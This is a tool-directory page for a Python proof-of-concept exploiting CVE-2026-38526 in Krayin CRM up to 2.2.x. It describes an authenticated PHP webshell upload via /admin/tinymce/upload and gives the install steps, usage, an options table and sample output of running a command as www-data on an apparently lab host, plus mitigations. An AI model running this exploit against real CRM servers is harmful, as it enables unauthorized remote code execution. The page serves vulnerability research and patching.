Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-38526 — Python PoC exploiting CVE-2026-38526 in Krayin CRM <= 2.2.x: authenticated PHP webshell upload via /admin/tinymce/upload leading to remote code execution. | Kitploit
Tools/GitHubGitHub/harry178945/cve-2026-38526
Vulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingRed TeamingRemote Access ToolPayload Development
GitHubharry178945/cve-2026-38526

CVE-2026-38526

Python PoC exploiting CVE-2026-38526 in Krayin CRM <= 2.2.x: authenticated PHP webshell upload via /admin/tinymce/upload leading to remote code execution.

12 days agoNot yet reviewed
View Repository

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-38526 — Krayin CRM ≤ 2.2.x Authenticated RCE

⚠️ Legal disclaimer: this code is provided for educational purposes and for authorized testing only (CTF, bug bounty, private lab). The author is not responsible for any illegal use.

Description

Krayin CRM (Webkul) ≤ 2.2.x exposes the /admin/tinymce/upload endpoint, which allows an authenticated user (even a low-privilege one) to upload files without extension validation. The file is then served from the storage/ folder, allowing arbitrary PHP code execution.

  • Type: Arbitrary File Upload → RCE
  • CVSS: 9.9 (Critical)
  • Authentication required: Yes (any valid account)

Installation

git clone https://github.com/<TON_PSEUDO>/cve-2026-38526.git
cd cve-2026-38526
pip install -r requirements.txt

Usage

python3 cve-2026-38526.py -t http://target.tld -u [email protected] -p 'password' -c 'id'

Options:

OptionDescription
-t, --targetTarget root URL
-u, --userKrayin account email
-p, --passwordPassword
-c, --commandCommand to execute (default: id)
--login-pathLogin path (default: /admin/login)
--upload-pathUpload path (default: /admin/tinymce/upload)
--timeoutHTTP timeout (default: 15)

Example

$ python3 cve-2026-38526.py -t http://billing.nexus.htb \
    -u [email protected] -p 'N27xh!!2ucY04' -c 'id'

[*] Retrieving CSRF token from http://billing.nexus.htb/admin/login
[*] Sending login form
[+] Authentication successful
[*] Uploading x8f2k1ab.php via http://billing.nexus.htb/admin/tinymce/upload
[+] Webshell accessible: http://billing.nexus.htb/storage/tinymce/x8f2k1ab.php
[*] Executing: id

============================================================
[+] Command: id
============================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
============================================================

Mitigation

  • Update Krayin CRM to the patched version.
  • Restrict the extension of uploaded files (whitelist).
  • Disallow PHP execution in the storage/ and uploads/ folders.
  • Apply the principle of least privilege to CRM accounts.

Disclaimer

This project is published for security research purposes. Any use against systems without prior written authorization is illegal and strictly prohibited.

Download Tool